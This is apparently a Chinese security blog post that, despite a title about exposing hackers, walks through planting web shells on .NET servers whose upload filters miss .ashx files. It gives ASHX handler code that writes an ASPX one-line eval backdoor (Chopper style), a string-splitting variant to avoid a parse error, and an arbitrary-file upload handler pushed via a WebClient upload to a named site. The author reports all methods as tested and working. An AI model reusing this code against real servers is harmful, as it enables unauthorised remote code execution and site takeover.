admin

揭穿黑客关于Ashx脚本写aspx木马的方法汇总

admin 安全防护 2022-12-30 374浏览 0

.Net环境,上传处未限制Ashx和Asmx,后者上传无法运行,提示Asmx脚本只能在本地运行,于是打算先传个Ashx脚本然后在当前目录下生成Aspx文件(目标不能执行Asp文件),网上找到如下Ashx代码:

<%@WebHandlerLanguage="C#"Class="Handler"%> 
 
usingSystem; 
usingSystem.Web; 
usingSystem.IO; 
publicclassHandler:IHttpHandler{ 
 
publicvoidProcessRequest(HttpContextcontext){ 
context.Response.ContentType="text/plain"; 
 
StreamWriterfile1=File.CreateText(context.Server.MapPath("root.aspx")); 
file1.Write("<%@PageLanguage=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>"); 
file1.Flush(); 
file1.Close(); 
 
} 
 
publicboolIsReusable{ 
get{ 
returnfalse; 
} 
} 
 
}

我将脚本中的Asp一句话改成菜刀的Aspx一句话~不过执行的时候爆错,说未知指令@Page。遂采用一下2种方式解决:

1,用String连接字符串

<%@WebHandlerLanguage="C#"Class="Handler"%> 
 
usingSystem; 
usingSystem.Web; 
usingSystem.IO; 
publicclassHandler:IHttpHandler{ 
 
publicvoidProcessRequest(HttpContextcontext){ 
context.Response.ContentType="text/plain"; 
stringshow="<%@PageLanguage=\"Jscript\"%"+"><%eval(Request.Item"+"[\"chopper\"]"+",\"unsafe\");%>"; 
StreamWriterfile1=File.CreateText(context.Server.MapPath("root.aspx")); 
file1.Write(show); 
file1.Flush(); 
file1.Close(); 
 
} 
 
publicboolIsReusable{ 
get{ 
returnfalse; 
} 
} 
 
}

2.比较笨的方法,看代码吧

<%@WebHandlerLanguage="C#"Class="Uploader"%> 
usingSystem; 
usingSystem.IO; 
usingSystem.Web; 
 
publicclassUploader:IHttpHandler 
{ 
publicvoidProcessRequest(HttpContexthc) 
{ 
foreach(stringfileKeyinhc.Request.Files) 
{ 
HttpPostedFilefile=hc.Request.Files[fileKey]; 
file.SaveAs(Path.Combine(hc.Server.MapPath("."),file.FileName)); 
} 
} 
 
publicboolIsReusable 
{ 
get{returntrue;} 
} 
}

然后用VS建立WinForm程序~主函数里写:

System.Net.WebClient myWebClient = new System.Net.WebClient();

myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST", "C:\\ma.aspx");

执行就可以了~以上方法均测试成功~

继续浏览有关 安全 的文章
发表评论